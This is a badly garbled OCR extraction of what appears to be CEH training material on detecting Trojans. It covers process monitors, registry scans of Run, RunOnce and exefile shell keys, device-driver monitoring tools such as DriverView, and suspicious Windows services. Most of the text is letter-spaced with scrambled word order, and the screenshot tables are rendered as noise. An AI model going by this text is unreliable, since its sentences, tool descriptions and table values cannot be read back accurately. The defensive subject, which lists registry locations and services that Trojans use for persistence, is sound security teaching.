y o u r
s y s t e m .
o n i t o r i n g
m a n y
p r o c e s s
s y s t e m .
B y
c o m p r e h e n s i v e
M
T h e s e
a n a ly z i n g
c o n t i n u o u s l y
a n d
p e r f o r m a n c e
d e g r a d a t i o n s
s o f t w a r e
lis te d
t h a t
t o o l s
y o u
f o r
m o n i t o r
c a n
y o u r
b e
t o o l s
d is p la y
list
c o n s o l e
p r o a c t iv e l y
t h r e a t e n s s
m o n i t o r i n g
t h e
m o n i t o r i n g
T o o ls
c a n
y o u r
t h e
list
e v e n
o f
y o u
all
id e n tif y
e n t i r e
e n t i r e
i m m e d i a t e l y
c o m p u t e r ,
a
t h a t
IT
c a n
u s e
t h e
t h e
p r o c e s s e s
t h e
T r o ja n s .
n e t w o r k
s y s t e m
i d e n t i f i e d
f o r
a n d
if it is h i d d e n .
IT
o f
n o t if ie d .
A
f e w
r u n n i n g
T h e s e
a n d
b e c a u s e
d e t e c t i o n
In
o r
o f T r o j a n s
in s ta lle d
t o o l s
p r o v i d e
i n f r a s t r u c t u r e .
w h i c h
a n y
a d d i t i o n ,
p r o c e s s
o n
a
T h e y
o u t a g e s
o r
it kills all t h e
m o n i t o r i n g
t o o l s
a r e
a s f o llo w s :
9
P r c V i e w
9
W i n s o n a r
9
H i d d e n F i n d e r
9
A u t o r u n s
9
K illP ro c e ss
9
S e c u r i t y
9
Y e t A n o t h e r
9
M O N I T
a v a il a b le
9
P r o c e s s
M o n i t o r
9
O p M a n a g e r
M o d u le 0 6 P a g e 9 5 6
a v a il a b le
a t
a v a il a b le
f o r
h t t p : / / w w w . t e a m c t i . c o m
a t
a v a il a b le
W i n d o w s
a v a il a b le
T a s k
h t t p : / / w w w . f e w b v t e . c o m
M a n a g e r
a t
h t t p : / / w w w . w e n p o i n t . c o m
a v a il a b le
a t
( r e m o t e )
a t
a t
h t t p : / / o r a n g e l a m p s o f t w a r e . c o m
a v a il a b le
P r o c e s s
a t
h t t p : / / w w w . n e u b e r . c o m
M o n i t o r
a v a il a b le
a t
h t t p : / / y a p r o c m o n . s o u r c e f o r g e . n e t
h t t p : / / m m o n i t . c o m
a v a il a b le
a v a il a b le
a t
a t
h t t p : / / w w w . m a n a g e e n g i n e . c o m
F n iv ta c
Windows automatically executes
instructions in
J
Finds registry errors, unneeded registryjunk
and helps in detecting registry entries created
by Trojans
e Run
R u n S e r v ic e s
e
e RunOnce
| N*ordrKteryX:C:«Vnd»w1\ir«trf»\{ACXa<kM 7»0‫ י‬U» 7«4AA1
NRUaidothertabE:vA«J»tatonsprt7«:8flPspav3nW_‫״‬x/t-arvct
NRU81>‫י‬otherhat!C:'LMer5\AJmr1SrabrOedctoo¥rtfo>Srtui ISO.1j
NRUa<d>ttKr)1at1CÎ>e»VUmraM>ak»«aktopr«t«o>Sc«w>ISC1.
NRUantiothertat E:Vfepfcatont'Asctcason'freb*Set«9.0.1re
NIKItrtiottwtabF-\Acotratnnt\Agplratonc¥rH>1r
(1 1 pt•
e R u n S e rv ic e s O n c e
S HKEY_CLASSES_ROOT\exefil
e \s h e ll\o p e n \c o m m a n d
"% 1 "
%*.
sections of registry
J Scanning registry values for suspicious
entries may indicate the Trojan
infection
http://www.macecraft.com
J Trojans insert instructions at these
sections of registry to perform
malicious activities
Cbpyright © by EC-CMBCil. All Rights Jte$ervei ; Reproduct ion is Strictly Prohibited.
^ 2 3 ‫־־‬
S c a n n i n g
f o r
S u s p ic io u s
R
e g i s t r y
E n t r i e s
ik j-G J
—
W e
W h e n
c a n
a
n o t i c e
v a r i o u s
a d v e r t i s e m e n t s
T r o ja n s .
in s ta lle d
c h a n g e s ;
p o p p i n g
u p .
o n
t h e
v i c tim 's
t h e
first
S o ,
s c a n n i n g
e x e c u t e s
m a c h i n e ,
s y m p t o m
is
t h e
s u s p i c i o u s
i n s t r u c t i o n s
in t h e
R u n S e r v i c e s
9
R u n O n c e
9
R u n S e r v i c e s O n c e
Q
H K E Y _ C L A S S E S _ R O O T \ e x e f i l e \ s h e l l \ o p e n \ c o m m a n d
‫ר‬
k
a t
j v l 6
P o w e rT o o ls
r e g is tr y j u n k
a n d
M o d u le 0 6 P a g e 9 5 7
v a l u e s
t h e s e
f o r
s u s p i c i o u s
s e c t i o n s
o f t h e
P o w e r T o o ls
e n t r i e s
r e g is tr y
2 0 1 2
t o
m a y
i n d ic a te
p e r f o r m
- R e g is t r y
g e n e r a t e s
s y s t e m
f o llo w in g
9
r e g is tr y
it
g e t s
r e g i s tr i e s
R u n
S o u r c e :
j v l 6
g e t s
©
i n s t r u c t i o n s
r
k e e p
W i n d o w s
S c a n n i n g
|Jj
T r o ja n
"% 1 "
a
s e c t i o n s
r e g i s t r y
s l o w e r .
h e lp
in
o f t h e
e n t r y .
V a r io u s
d e t e c t i n g
re g is try :
%*
T r o ja n
m a l i c i o u s
w ill
a
in f e c tio n .
T r o ja n s
i n s e r t
a c tiv itie s .
C le a n e r
h t t p : / / w w w . m a c e c r a f t . c o m
2 0 1 2
is
h e l p s
t h e
in
u ltim a te
d e t e c t i n g
re g istry
r e g is tr y
c le a n e r
e n t r i e s
u s e d
t o
c r e a t e d
fin d
b y
r e g is tr y
e r r o r s
a n d
u n n e e d e d
T r o ja n s .
jv16 PowerTools 2012 [W8-x64] - Registry Cleaner
Fte
Select
Iools
Help
Key
HKCRV-ocal SettingsôftwareWicrcsoft\W1ndows\ShelV*mCa:he\
Entry’s name
D: \CEH ■T:>0ls\SaltyBee.Exe.FriendlyAppName
Value
SaltyBee
Entry last modified
01.10.2012,05:02
Error seventy
25
Error descripbon
MRU and other history data
Fie reference
D:\CEH-T30lsV5altyBee.Exe
ReasDn for detection Invalid file reference
Tags
Key /
Entry's name
□
Q
□
HCCR\ ®
Entry last modified Errcr severity
Value
Error descnpton
Invalid file or directory reference
0
71 —
Fie or drectory ‫־‬C: C:\Windows\Installer’,{AC76BA86-7AD7-1033-7B44-A95000000001}\XFDFFileJ
C:\Wi1dows\Installer\{AC76BA8 20.09.2012, 07:46
□
H*ER\ E:\Applicali ns Intel_mul6-<tevice_A09_R30799 01.10.2012, 05:02
NRU and other hista E:\Applicatjons\pell j4028r l\pisplay\Intel_multi-device_A09_R3079Q2.exe
□
HKG^C:VJsers\Admir Firefox
01.10.2012, 05:02
MRU and other hist( C:\Users\Administratorpesktopîrefox Setup 15.0. l.exe
□
HKCR^C: VJsers\Admir Mozilla
01.10.2012, 05:02
□
«<‫ ץ?ב‬E:\Applications Firefox
01.10.2012, 05:02
25%
MRU and other hist« E:\Applications\AppliationsV=iref6x Setup 9.0. Lexe
□
HKCR^ E:\Applications Mozilla
01.10.2012, 05:02
25%
MRU and other hish E:\Appiications\Applicationsîrefox Setup 9.0. Lexe
□
HKCR^C:\Program File Atelie‫ ־‬Web Remote Commander 01.10.2012, 05:02
25%
MRU and other hist( CiVôgram Files (x86)\Atelier Web Remote Commander Pro\awrcp.exe
□
HKCR^ C: \Program File AtelieWeb Software
25%
MRU and other hist( CrVôgram Files (x86)\Atelier WebVêmote Commander Pro\3wrcp.exe
01.10.2012, 05:02
MRU and other hist( C:VJsers\Administratorpesktopîref6x Setup 15.0. l.exe
01.10.2012,05:02 |
I K CR^ D:\CEH-Tools\S SaltyBee
□
HKCR\C:\Users\Admir SaltyBee
01.10.2012, 05:02
25%
MRU and
□
HKCR\D:\CEH-Tools\C wireshark-win32-l. 4.2.exe
01.10.2012, 05:02
25%
MRU and other hist( D:\CEH-T00ls\CEHv8 Module 10 Denial of Service \Wireshark\w1reshark-vwn32-l.
□
HKCf^ C:\Users\AdmirMicrosoft Visual Studio Premium 01.10.2012, 05:02
25%
MRU and
□
HKCR\C:\Users\Admir Microsoft Corporation
01.10.2012, 05:02
25%
MRU and
other hist( C : VJsers \Admm1s tra tordownloads \vsjxemium.exe
□
HKOA E:\Appl1cations Intel_multl-devlce_A09_R30799 01.10.2012, 05:02
25%
MRU and
other hist( E: \Appl1cabons^)ell j4028r lpisplay\Intel_multi-device_A09_R307992.exe
□
HKCU^C:\Users\Admir Firefox
6%
MRU and
<
01.10.2012, 05:02
III
other Ns& C : YJsers\Admm1stra tordownloads V.os tD00r_v6\SaltyBee.Exe
other hist( C:\Users\Admm1stratorpownloads\vs_premium.exe
other hist( GVUsersVAdmmistratorVDesktopîrefox setup 15.0. l.exe
1
Custom fix...
>
|f
Fix
Delete
Cose
J
Selected: 0, highlighted: 1‫ ׳‬total: 1492
FIGURE 6.53: jv l6 PowerTools 2012 -Registry Cleaner
M o d u le 0 6 P a g e 9 5 8
-X
R
^
M
S o u r c e :
P C
E n t r y
M
o n i t o r i n g
T o o l :
P C
T o o l s
t h a t
s c a n s
R
e g i s t r y
e c h a n i c
h t t p : / / w w w . p c t o o l s . c o m
T o o ls
s u s p i c i o u s
s y s t e m
e g i s t r y
R e g is tr y
e n t r i e s
s p e e d
p e r s o n a l
a n d
p r iv a c y .
M e c h a n i c
c r e a t e d
b y
m a x i m i z e s
It
k e e p s
is
a n
a d v a n c e d
T r o j a n
i n f e c ti o n s .
s o f t w a r e
all
y o u r
r e g i s tr y
c l e a n e r
It f i x e s
p e r f o r m a n c e .
I n t e r n e t
a n d
t h e
W i n d o w s
It c l e a n s
PC
u p
a c tiv itie s
y o u r
t h e
e r r o r
r e g is tr y
a n d
s y s t e m
p r iv a t e
a n d
v a l u e s
i m p r o v e s
a n d
s e c u r e s
e r a s e s
f o r
y o u r
y o u r
s e n s i t iv e
p e r m a n e n t l y .
M o d u le 0 6 P a g e 9 5 9
PC T o o ls | Registry M echanic
PC T o o ls | R egistry M echanic
FIGURE 6.54: PC Tools Registry Mechanic Tool Screenshot
M o d u le 0 6 P a g e 9 6 0
Registry Entry Monitoring Tools
5
Reg O rganizer
h ttp ://w w w . chemtable. com
I
trnm
1
MJ Registry W atcher
http://w w w .jacobsm .com
Registry S how er
Active Registry M onitor
http://w w w .registryshow er.com
h ttp://w w w .devicelock.com
1___j
C om odo Cloud S canner
SpyM e Tools
http://w w w .com odo.com
http://w w w .lcibrossolutions.com
B uster Sandbox Analyzer
R egshot
h ttp ://b s a.isoftw are.nl
http://regshot.sourceforge.net
&
All-Seeing Eyes
L a\
CEH
Registry Live W atch
&
h ttp ://w w w .fo rte go .com
h ttp ://le e lu s o ft. blogspot.in
R
In
M e c h a n i c ,
d e t e c t
f o r t h e
e g i s t r y
a d d i t i o n
t h e r e
T r o j a n s
E n t r y
t o
a r e
j v l 6
m a n y
in s ta lle d ,
p u r p o s e
0
R e g
O r g a n i z e r
0
R e g is tr y
9
C o m o d o
9
B u s t e r
0
A ll-S e e in g
0
M J
0
A c tiv e
0
S p y M e
0
R e g s h o t
a v a il a b le
0
R e g is tr y
Live W a t c h
C lo u d
S a n d b o x
E y e s
R e g is tr y
M o d u le 0 6 P a g e 9 6 1
T o o ls
t h e
f e w
a t
a v a il a b le
M o n i t o r
a t
a ll o w
a r e
-
R e g is tr y
y o u
r e g is tr y
lis te d
T o o ls
a s
t o
e n t r y
C l e a n e r
m o n i t o r
a n d
r e g is tr y
m o n i t o r i n g
t o o l s
PC
T o o ls
e n t r i e s
t h a t
a n d
a r e
R e g is tr y
t h u s
h e lp
m a i n l y
u s e d
f o llo w s :
h t t p : / / w w w . c h e m t a b l e . c o m
a t
h t t p : / / w w w . r e g i s t r y s h o w e r . c o m
a t
a v a ila b le
a t
h t t p : / / w w w . c o m o d o . c o m
a t
h t t p : / / b s a . i s o f t w a r e . n l
h t t p : / / w w w . f o r t e g o . c o m
a v a il a b le
a v a il a b le
t h a t
a v a ila b le
A n a l y z e r
2 0 1 2
o f t h e
r e g is tr y
S c a n n e r
a t
t o o l s
A
a v a il a b le
W a t c h e r
R e g is tr y
o t h e r
a v a il a b le
S h o w e r
o n i t o r i n g
P o w e r T o o l s
if a n y .
o f c l e a n i n g
M
a t
h t t p : / / w w w . j a c o b s m . c o m
a v a il a b le
a t
h t t p : / / w w w . d e v i c e l o c k . c o m
h t t p : / / w w w . l c i b r o s s o l u t i o n s . c o m
h t t p : / / r e g s h o t . s o u r c e f o r g e . n e t
a v a il a b le
a t
h t t p : / / l e e l u s o f t . b l o g s p o t . i n
Scanning for Suspicious Device
Drivers
CEH
Trojan Device
Driver
S c a n n i n g
W h e n
T r o j a n s
u s in g
in s ta lle d
a
m a y
d e v i c e
s h ie ld
a ls o
w i t h
a v o id
d o w n l o a d e d
g e t
d r iv e r
a lo n g
t o
d e v i c e
f r o m
M o d u le 0 6 P a g e 9 6 2
f o r
d r iv e r s
in s ta lle d
m o n i t o r i n g
d e v i c e
d e t e c t i o n .
t h e
S u s p ic io u s
a r e
o n
d o w n l o a d e d
t h e
to o ls ,
d r iv e r s
S c a n
p u b l i s h e r 's
e v i c e
f r o m
D
v a r i o u s
s y s t e m .
T r o j a n s
u s e
w e
id e n tif y
if t h e r e
c a n
d o w n l o a d e d
f o r
D
s u s p i c i o u s
o rig in a l
f r o m
r i v e r s
s o u r c e s
t h e s e
is
u n t r u s t e d
d e v i c e
d r iv e r s
t h a t
d e v i c e s
a n y
v e rify
n o t
c o v e r s
T r o ja n
s o u r c e s
a n d
a s
a r e
a n d
t o
p r e s e n t .
u s e
if t h e y
t r u s t w o r t h y
h i d e
t h e s e
a r e
b u t
T r o j a n s
d r iv e r s
g e n u i n e
b y
a r e
a s
a n d
site .
Trojan Device
Driver
cdrom.sys
System information
M. M* * • .
H■*
Sy1t*n S tm v r
2
P«e>jrc*<
■ [OTpcnwa
- ScftHft Emvcmot
Emormtnl ViTMbkt
im o tO
*P*
i:p*x
*rpoagr
Nrt*Cft C&wctore
S4rac«
Program V->up*
Mar*? *o ? •m ,
OU R*9«trjbCf•
Wn40«1 Iro r Bepertryj
*IptfKl
aM
.jpUO
amcfca
•1<d1yn
•n d u u
MWfctH
Ovrrptor
3‫ז‬W OKI CompInn* Hc‫«׳‬
Jwif*
W»Cf040« ACH CfMf
MKTCiOft ACUfcl OriVCf
ACft Procvttcr Aggr«o*or..
ACMPower Meter Dretr
ACWWjkt Alarm Cfr.tf
adit
«dâ
adpjfcc•
adpoJ?c
AnolUiy f 1r>0‫׳‬0‫>׳‬Clr.tr (0«._
H « AG# Brt f«cr
AM) Ki PtMMW Dnnr
AN© »1atntoe 01rr*t
*mjwtJ
*nvlibt
fife
CYandOwSMc\*«nd©<rt\s.c\w«t40wf\c..
c\wnaows\s‫״‬
c\v«ndowfi.c\ ma40ws\ sC\<«ndow}U..
cAvwvdows's
c\wan40wf\s~
e\w1ndow»\»~
rVw*«40v<\<
Tyr*
KctnH Dtwi
KcmHOnrfr
Kamt< 0«‫״‬e»
KcmH Dmer
Ktmri Drwtr
Kernel Orew
«m H Onr*f
Kamri 0‫« ״‬
K«mrl O w
KtmH Dnrff
ramM Pm*(
KKnHOnx•
c\v»ndows\s- KtmH Owe
rVwmdowtH Kamri D*w*‫׳‬
KaraH
c\*nntfow»\»‫ ״‬KtmHOtW
«AwM4a<vi\t
Kenul Bm *
mo
□ uarrf
<«Ug«ry On*,
NO
NO
VK
m
No
No
NO
m
No
NO
NO
V»»
NO
No
No
NO
No
v
UOM’ Wd
O Sajrrt ertagery n»m»t onty
A ttacker
Go to Run ‫ >־־‬Type m s in f 032 ‫ ^־־‬Software Environment ‫ >־־‬System Drivers
FIGURE 6.55: Scanning for Suspicious Device Drivers
M o d u le 0 6 P a g e 9 6 3
D evice Drivers Monitoring
Tool: DriverView
J
CEH
D riv e rV ie w u tility d isp lay s th e list o f a ll d e v ic e d riv e rs c u rre n tly lo a d e d on system . F o r e a c h d riv e r in th e list,
a d d itio n a l in fo r m a tio n is d isp la y e d su ch as lo a d a d d re s s o f th e driver, d e s c rip tio n , v e rsio n , p ro d u c t n a m e, c o m p a n y
th a t c re a te d th e driver, etc.
DnverView
L
File Edit View Options Help
f a eg •3J 8 ‫־‬
Address
0003X100X St-9000
000X000032FKDC
0000x00 0P09000
000X00000162000
x
wfjooo
x
‫ ו‬t‫?׳‬t9000
000:0000 16900000
000x1000 '6901CW
0000X001(1933000
00033000 168MOOO
000X000 16812000
ooor»nooo 16900000
x
‫ון ז‬
000030001iUKJOO
B»»W)'JIMOOO
000X000 1MU0D0
000X000 ‫ולו‬STOO
0000X100 ‫ י‬SM8000
x
n
000X0001£38000‫צ‬
000X000 OICDOX
x
isrooooo
0000X00 l5MfW0
x
‫צפצ‬£ ‫נ‬
000330001>023030
d cdd.dii
9 TSDDDdll
# win32k.sys
9 passthrupe sct.sys
® vhdparser.sys
® atyncmac syt
» WPR0.4U001.jyi
‫ *י‬wv.syi
♦ rv .syt
♦ vhdmp.tyl
• rjOepend!.sy*
1
0000001
000000
12
00000015 000
« ‫י*ימ>י‬9•*(*
♦ wvneUys
♦
■> idpdi.tyi
‫ »י‬npf.eyt
O NIProbeMenvSYS
O WnVDfdrv6.tys
* HTTP.Syt
<> lunparsci.sys
‫י‬3‫ י‬eondrvsys
# storport.sys
# WmVDEdrv.sys
mrjsmbiOiVj
00000015»00
000000
0000001 00
Load.. Indei
12S
1
124
1
123
5
121
‫ו‬
1S3
•*?
OaOXOaOOG 1
CMXOOcOOC 1
14S
OtfOXcOOC 1
oaofcox
1
145
UOP3MOOO 1
o>oooaoooc
151
0‫י‬0‫ מ‬1?000 2
150
142
00x12000 ‫ו‬
j
141
(WXOCfcOOO 1
140
a o x rx c
1
l»
orioaotooo
117
&01XKCC 1
116
IB
* 0000000 ‫ו‬
OrtXfelOOO 1
1J4
154
(k033Ct>000 1
OkCOXOOOO 1
143
OrCOyUOOC 1
‫־״‬
144
CfcXOttOOC 1
<kX03900c ‫ו‬
■‫״‬
See
uxoeooo:
CkOXJbOOC
(HX00900C
frCC3cdOO>
2
147
146
1
1
file Type
Drive!
Display [kwer
0!5ptoy Driver
System Dir•**
System Diner
System Oliver
Net* orlr Driver
Unknown
NetMO<\ D1rv«f
Netwerfc ‫׳‬vw
Sydm Or»*er
Viter‫ ״‬D»r<rr
Application
NatAOfli Oiivef
V !••‫ ״‬M o
Onvei
S 'rt"" 01n>*r
fynern Diner
Unknown
Syitem Oliver
System Oliver
V/flnr• Oliver
Driver
Unknown
ivitcm Oliver
01
Description
W1ndc«5 NT OpenType/Type 1 ...
Canonical Display Driver
Framebuffer Deploy Driver
Multi-User Win32 Oliver
Pass thru patter
Native VHO patter
MSRemote Access serial networ...
Version
S.12^34
6.2.84000
6.2.840010
62.84000
62.84000
67.8400 0
6 ?84000
Company
Adobe System™
Microsoft Corp..
Microsoft Corp~.
Microsoft Corp...
Microsoft Corp...
Microsoft Corp...
Microsoft Corp...
Server dnver
5mt»2.0 Servet dtivei
WD Miniport Dover
Fik Sytfem Dependency Manag...
TCP/IP Registry Compatibility 0...
Server Network duvet
MH nm nn SKUttlTV D>k‫׳‬w
NfccroteU Rt»‫ ׳‬Device !•director
npf.ey* (NTV6 AM064) Kernel D...
NiProbeMemfoe Observer Devie...
62.840010
62.84000
67.8400 0
62.840010
62.84000
. . MOO.
4.I.H.0
62.84000
4 1.0.2001
16.0.8.0
Microsoft Corp...
Microsoft Corp...
Microsoft Corp..
Microsoft Corp...
Mktosoft Corp...
Microtoft Corp..
M iiw w n C
Microsoft Corp..
CACI ToehnoL.
Network Insftu.
HTTP Protocol Stick
lun parse!
Console Driver
Mkmoft Storage Port Driver
ViiUmI Enayption Drive
lonohoin SM8 2.0 Redirector
62.84000
6.2.8400.0
6 ?8400 0
6.2,84000
7.0.0.0
62.8400.0
Microsoft Corp...
Microsoft Corp..
Microsoft Corp...
Microsoft Coep...
NewSoftwires....
Microsoft Coro...
oxooox u . B
oxoooo:x_
OXOOOXC0000000010X000X1..
00000X1..
00000000*1030000x1oxoooo: oxooox ..
OXOOOX'‫י‬..
0X000X1..
0X000031OCWCWJ1..
0X0000: 1OXOOOX 1_
0X0000:10X000X1..
0X000X1x
: OXOOOX 1..
0X000X10X000031OXOOOX'‫״‬
11
000001
155 item(i), 1 Selected
http://www.nirsoft.net
D
e v i c e
S o u r c e :
T h e
D r iv e r V ie w
D
r i v e r s
u tility
d is p la y s
t h e
is
t h e
d e s c r i p t i o n ,
v e r s i o n ,
b r o w s i n g
o n
y o u r
f o r
s y s t e m
s y s t e m
list o f d r i v e r s
M o d u le 0 6 P a g e 9 6 4
o n i t o r i n g
T o o l :
D
r i v e r V
i e w
A d d i t io n a l
d riv e r,
M
y o u
t h a t
d i s p l a y e d
c a n
o n
f o r
p r o d u c t
c o m p o n e n t s
a r e
e n t i r e
c u r r e n t l y
e a c h
a n d
n a m e ,
s e p a r a t e l y
e a s ily
k n o w
y o u r
s y s t e m
all t h e
e v e r y
in
a n d
C o n t r o l
o n
d e v i c e
d r iv e r
c o m p a n y
d r iv e r s
q u ic k ly
l o a d e d
t h a t
t h e
j u s t
s y s t e m .
It c a n
list
c r e a t e d
P a n e l ,
y o u r
e a sily .
in
d r i v e r s
T h is
c r e a t e
s u c h
t h e
b y
list
in
a s
d r iv e r ,
r u n n i n g
y o u r
l o a d
e tc .
th is
a p p li c a ti o n
H T M L
s y s t e m .
a d d r e s s
o f
I n s t e a d
o f
a p p li c a ti o n
d i s p la y s
t h e
r e p o r t s .
35
DriverView
File
a
Edit
0
View
^
!‫ע‬
Options
Help
$
Driver Name
Address
Size
Load...
Index
File Type
Description
Version
Company
End A...
* ATMFD.DLL
000C000000B69000
0x00060000
2
125
Driver
Windows NT OpenType/Type 1 ...
5.1.2.234
Adobe System...
OOOOOOOO'O..
* cdd.dll
OOOOOOOOOO8FFOOO
Display Criver
Canonical Display Driver
6.2.8400.0
Microsoft Corp...
000000000.. =
1
124
* TSDDD.dll
00000000 00709000
0x00009000
1
123
Display Criver
Framebuffer Display Driver
6.2.8400.0
Microsoft Corp...
OOOOOOOO'O..
♦ win32k.sys
OOOCOOOO'OOl 62000
0x003ed000
5
121
System Criver
Multi-User Win32 Driver
6.2.8400.0
Microsoft Corp...
OOOOOOOO'O.,
0x00036000
OOOCOOOO'l69F3000
OxOOOObOOO
1
153
System Criver
Pass thru parser
6.2.8400.0
Microsoft Corp...
^ vhdparser.sys
000000001 69E9000
OxOOOOaOOO
1
149
System Criver
Native VHD parser
6.2.8400.0
Microsoft Corp...
^ asyncmac.sys
OOOCOOOO'169DD000
OxOOOOcOOO
1
148
Network Driver
MS Remote Access serial networ...
6.2.8400.0
Microsoft Corp...
* WPRO_41_2001 .sys
OOOCOOOO'l 69D1000
OxOOOOcOOO
1
147
Unknown
♦ srv.sys
OOOCOOOO'l 6933000
0x0009eOOO
1
1-16
Server driver
6.2.8400.0
Microsoft Corp...
‫ •י‬srv2.sys
OOOCOOOO'l 6896000
0x0009d000
1
145
Network Driver
Smb 2.0 Server driver
6.2.8400.0
Microsoft Corp...
^ vhdmp.sys
OOOCOOOO'l 6812000
0x00080000
1
151
System Criver
VHD Miniport Driver
6.2.8400.0
Microsoft Corp...
# FsDepends.sys
OOOCOOOO'16800000
2
150
System Criver
File System Dependency Manag...
6.2.8400.0
Microsoft Corp...
^ tcpipreg.sys
OOOCOOOO'15FE3000
1
142
Application
TCP/IP Registry Compatibility D...
6.2.8400.0
Microsoft Corp...
passthruparser.sys
0x00012000
0x00012000
Network Driver
® srvnet.sys
OOOCOOOO'15F9F000
0x00044000
3
141
Network Driver
Server Network driver
6.2.8400.0
Microsoft Corp...
£ secdrv.SYS
OOOCOOOO'15F94000
OxOOOObOOO
1
140
System Criver
Macrovision SECURITY Driver
4.3.86.0
Macrovision C...
♦ rdpdr.sys
OOOCOOOO'15F63000
0x00031000
1
139
Driver
Microsoft RDP Device redirector
6.2.8400.0
Microsoft Corp...
^ npf.sys
OOOCOOOO'15F57000
OxOOOOcOOO
1
137
System Criver
npf.sys (NT5/6 AMD64) Kernel D...
4.1.0.2001
CACE Technol...
« NiProbeMem.SYS
OOOCOOOO'15F48000
1
136
NiProbeMem for Observer Devic...
16.0.8.0
Network Instru...
^ WinVDEdrv6.sys
OOOCOOOO'l 5F19000
0x0002f000
1
135
Unknown
* HTTP.sys
OOOCOOOO'l 5E38000
OxOOOelOOO
OxOOOOfOOO
1
134
System Criver
System Criver
HTTP Protocol Stack
6.2.8400.0
Microsoft Corp...
♦ lunparser.sys
OOOCOOOO'l 5EODOOO
OxOOOObOOO
1
154
System Criver
lun parser
6.2.8400.0
Microsoft Corp...
•
000000001..
000000001..
000000001..
000000001..
000000001..
000000001..
000000001..
000000001..
000000001..
000000001..
000000001..
000000001..
000000001..
000000001..
OOOOOOOO'I..
OOOCOOOO'l 5E00000
OxOOOOdOOO
1
143
System Criver
Console Driver
6.2.8400.0
Microsoft Corp...
^ storport.sys
OOOCOOOO'l 5D9E000
0x00054000
1
152
System Criver
Microsoft Storage Port Driver
6.2.8400.0
Microsoft Corp...
♦ WinVDEdrv.sys
OOOCOOOO'l 5D5EOOO
0x00040000
1
144
Unknown
Virtual Encryption Driver
7.0.0.0
NewSoftwares....
000000001..
000000001..
000000001..
000000001..
000000001..
‫ ♦י‬mrxsmb20.svs
OOOCOOOO'l 5D2 5000
0x00039000
1
133
Svstem Criver
Lonohorn SMB 2.0 Redirector
6.2.8400.0
Microsoft Coro...
(XXXXXXX) 1.. v
condrv.sys
155 item(s), 1 Selected
F IG U R E
M o d u le 0 6 P a g e 9 6 5
6 .5 6 :
D r iv e r V ie w
S c r e e n s h o t
Device Drivers Monitoring Tools
i
j ‫״‬j
Driver D etective
Driver Reviver
■
V
http://www.drivershq.com
http://www.reviversoft.com
\
1
U nknow n Device Identifier
^
http://www.zhangduo.com
(v
DriverGuide Toolkit
y y
DriverMax
H
D riverScanner
http://www.uniblue.com
_•
D ouble Driver
‫ו‬
http://www.driverguidetoolkit.com
,
http://www.boozet.org
My Drivers
B B B
□ □ ‫ם‬
http://www.innovative-sol.com
CEH
http://www.zhangduo.com
Driver M agician
DriverEasy
http://www.drivermagician.com
http://www.drivereasy.com
D
A
e v i c e
f e w
o f
D
t h e
r i v e r s
d e v i c e
M
d r iv e r
o n i t o r i n g
m o n i t o r i n g
T o o l s
t o o l s
t h a t
h e lp
in
d e t e c t i n g
T r o ja n s
a r e
lis te d
a s
f o llo w s :
0
D r iv e r
0
U n k n o w n
0
D r i v e r G u id e
0
D r i v e r M a x
0
D r iv e r
M a g ic i a n
0
D r iv e r
R e v iv e r a v a il a b le
0
D r i v e r S c a n n e r
0
D o u b l e
0
M y
D r iv e r s
a v a il a b le
a t
h t t p : / / w w w . z h a n g d u o . c o m
0
D r iv e r E a s y
a v a il a b le
a t
h t t p : / / w w w . d r i v e r e a s v . c o m
M o d u le 0 6 P a g e 9 6 6
D e t e c t i v e
D e v ic e
a v a il a b le
I d e n tifie r
T o o lk it
a v a il a b le
D r iv e r
a t
a v a il a b le
a v a il a b le
a t
h t t p : / / w w w . d r i v e r s h q . c o m
a t
a t
h t t p : / / w w w . z h a n g d u o . c o m
h t t p : / / w w w . d r i v e r g u i d e t o o l k i t . c o m
h t t p : / / w w w . i n n o v a t i v e - s o l . c o m
a v a il a b le
a t
h t t p : / / w w w . d r i v e r m a g i c i a n . c o m
a t
h t t p : / / w w w . r e v i v e r s o f t . c o m
a v a il a b le
a t
h t t p : / / w w w . u n i b l u e . c o m
a v a ila b le
a t
h t t p : / / w w w . b o o z e t . o r g
Windows Services
Trojans spawn Windows services allow
attackers remote control to the victim
machine and pass malicious instructions
Trojans renam e their processes
to lo o k like a gen u in e W in d o w s
service in o rd e r to avoid
d etectio n
Enterprise Service Manager
1 1.1
r <mp i
<Lccei
DtaftvN**!
0J ■
<•■!‫׳‬
0 J £'<r,p‫׳‬r : Pie $*wrn(E...
03
OJ WndOM Evrrr L
0 J CCM• £‫*־‬kI
OJ f uvl»‫־‬n ocovffy Prcvi
OJ fmcfen 0 ■cvivr R*w...
OJ *rev** Fart C«* « 5a
A/Wnjciia FtearhlnnFo
•#'1cro:o‫״‬FT=$e!Mco
U i - , ‫ ״‬fw‫ ״‬r
0
1
1«1
1
0COflMM.<Jl
®-nvoierrro
(?.■(Wiorrfo..
[?**ndrSV
1CTvTUB
(Lceel
<10011...
<l«el
<L J ...
tlccsJ...
<Lcc«l ..
<Locai...
rrA
00
<1
$Mlu»
Slap
Run‫״‬
x
A
Path
CAV/1
I
Bum..
Rim.
Stop
vU>p..
Rum..
Slop.
Rum..
R*‫י ״‬
L^_ ‫ם‬
.. Atfomjtic
f f M
DVVVI
Automatic
C.VWt‫ ״‬Automatic
t\V /l
Manu5l
CAV/1... Manual
CVWl.. Auomatic
C:VWi
Manual
CWl.. Automatic
l -n.hr
rsv/5
I-M55ELCK.4K41
611
J
Trojans em ploy rootkit techniques to m a n ip u la te
H K EY_ LO C A L_M A C H IN E\S ystem \C u rren tC on trolS et
\S ervices registry keys to h id e its processes
V
1ar6/a
S c a n n i n g
f o r
S u s p ic io u s
W
i n d o w
s
S e r v ic e s
w
O n c e
t o
o p e r a t e
g e n u i n e
p a s s
t h a t
to o ls ,
in
f r o m
y o u
c a n
W i n d o w s
t o
a
in
in s ta lle d
r e m o t e
o r d e r
d e t e c t
i n s t r u c t i o n s .
o r d e r
a r e
s e r v i c e s
s p a w n
m a l i c i o u s
s e r v i c e
T r o j a n s
s y s t e m
W i n d o w s
m o n i t o r i n g
T r o j a n s
t h e
t h e
a v o id
t h e
W i n d o w s
lo c a tio n .
t o
a v o i d
s e r v i c e s ,
T r o j a n s
a ls o
d e t e c t i o n .
it
b e c o m e s
c r e a t e
W i t h
t h e i r
t h e
f o r
a n
a t t a c k e r
p r o c e s s e s
t o
lo o k
h e lp
e a s y
o f
W i n d o w s
like
s e r v i c e s
T r o ja n s .
s e r v i c e s
T r o ja n s
o n
a ll o w
a t t a c k e r s
r e n a m e
d e t e c t i o n .
t h e i r
T r o j a n s
r e m o t e
p r o c e s s e s
e m p l o y
